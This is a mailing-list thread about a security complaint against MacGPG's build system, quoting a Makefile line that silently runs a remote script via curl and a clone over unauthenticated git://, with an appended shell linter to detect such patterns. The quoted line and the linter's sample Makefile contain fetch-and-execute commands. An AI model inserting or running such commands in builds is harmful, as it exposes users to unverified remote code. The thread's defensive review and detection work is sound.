On 2015-02-16 22:48, Jonathan Schleifer wrote:
> Hi!
>
> I hereby request that MacGPG gets removed from gnupg.org due to serious
> security concerns. Basically, the first thing the Makefile in all their repos
> / tarballs does is this:
>
> @bash -c "$$(curl -fsSL
> https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)"
>
> So you type make not expecting anything bad (you verified the checksum and
> everything), but you just executed remote code. Great. And they even hide it
> from you by prefixing it with @, which is downright evil. So you never notice
> unless you look at the Makefile. Currently, that script clones another common
> repo using the unverified git:// protocol (because, why use submodules if you
> can do it in an insecure way?), but obviously, that can change any minute and
> could change just for certain IPs etc.
>
> The developer(s) don't allow any issues on GitHub, so I tried contacting them
> by other means (e.g. Twitter), only to get ignored. They clearly don't care
> about security.
>
> In any case, somebody who does something like this clearly doesn't care about
> security the least. The potential for backdoors is extremely high and I think
> nobody should be using any software written by this developer / these
> developer(s), as they clearly demonstrated that they couldn't care less about
> your security.
>
> I don't feel comfortable that the majority of Mac users are using this
> software which doesn't care for security at all, but is used for extremely
> security sensitive tasks. I guess this is because gnupg.org recommends it and
> therefore people think it's safe. I think gnupg.org should do the contrary
> instead and strongly discourage using it.
>
> --
> Jonathan
>
It is true that there's a pretty big security hole there with "git clone git://github.com...", since any malicious attacker can intercept that communication. There's no checksumming or anything to make this difficult *at all*.

What *does* surprise me is that there's a commit to specifically remove git+ssh in favour of insecure ssh. There's no comment on why that was done either:
https://github.com/GPGTools/GPGTools_Core/commit/5186bade36acedfdc0b76f9f5ddfcfc004ec698b

However, I'd recommend that you go over the proper support channels first (rather than merely twitter) before asking that references to the project are deleted. As stated on https://gpgtools.org/:

Please report any issues you find on our support platform.

Which points to http://support.gpgtools.org/.

Cheers,

--
Hugo Osvaldo Barrera
A: Because we read from top to bottom, left to right.
Q: Why should I start my reply below the quoted text?
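The two constructs the thread objects to, a recipe line that runs `bash -c "$(curl ...)"` behind a silencing `@`, and a clone over the unauthenticated `git://` transport, are easy to miss in a code review but easy to grep for. The following POSIX shell linter is an added example, not code from the thread, from GPGTools or from gnupg.org: it scans a Makefile for pipe-to-shell, remote-script-as-command and `git://` patterns and notes when the offending line is hidden with `@`. The sample Makefile it scans is constructed here (the `example.invalid` hostnames and the function names are assumptions); the first recipe line copies the shape quoted in Jonathan's mail.

```shell
#!/bin/sh
# Added example (not from the thread or from GPGTools): a small linter that
# flags Makefile recipe lines which fetch and run remote code, or which
# pull sources over git://. It is pattern matching only; a flagged line
# still has to be read by a person.

scan_makefile() {
    # $1: path of the Makefile to inspect.
    # Findings go to stderr; the number of findings is echoed on stdout.
    file="$1"
    count=0
    while IFS= read -r line; do
        hit=""
        case "$line" in
            # remote script fetched and piped straight into a shell
            *curl*"|"*sh*|*wget*"|"*sh*)
                hit="pipe-to-shell" ;;
            # `sh -c "$(curl ...)"` style: the downloaded text is the command
            *'sh -c'*'$('*curl*|*'sh -c'*'`'*curl*)
                hit="remote-script-as-command" ;;
            # git:// authenticates neither the peer nor the data
            *git://*)
                hit="unauthenticated-git-transport" ;;
        esac
        [ -z "$hit" ] && continue
        count=$((count + 1))
        # make does not echo recipe lines that start with @, so the user
        # never sees the command run; record that on the finding.
        stripped=$(printf '%s\n' "$line" | sed 's/^[[:space:]]*//')
        case "$stripped" in
            @*) hit="$hit (silenced with @)" ;;
        esac
        printf '%s: %s: %s\n' "$file" "$hit" "$line" >&2
    done < "$file"
    echo "$count"
}

write_sample_makefile() {
    # $1: output path. Constructed sample: three recipe lines that should be
    # flagged and one ordinary compile step that should not.
    printf 'all:\n' > "$1"
    printf '\t@bash -c "$$(curl -fsSL https://example.invalid/prepare-core.sh)"\n' >> "$1"
    printf '\tgit clone git://example.invalid/core.git\n' >> "$1"
    printf '\tcurl -fsSL https://example.invalid/install.sh | sh\n' >> "$1"
    printf '\tcc -o tool tool.c\n' >> "$1"
}

demo_scan() {
    # Write the constructed sample, scan it and return the finding count.
    tmp=$(mktemp)
    write_sample_makefile "$tmp"
    n=$(scan_makefile "$tmp")
    rm -f "$tmp"
    echo "$n"
}

demo_scan
```

Run as `sh scan-makefile.sh`: the three suspicious lines are printed to stderr with their category, the first one marked as silenced with `@`, and the count `3` goes to stdout. Point `scan_makefile` at a real Makefile to check a tarball before typing `make`; a clean run prints `0`.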
_______________________________________________
Gnupg-users mailing list
Gnupg-users@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-users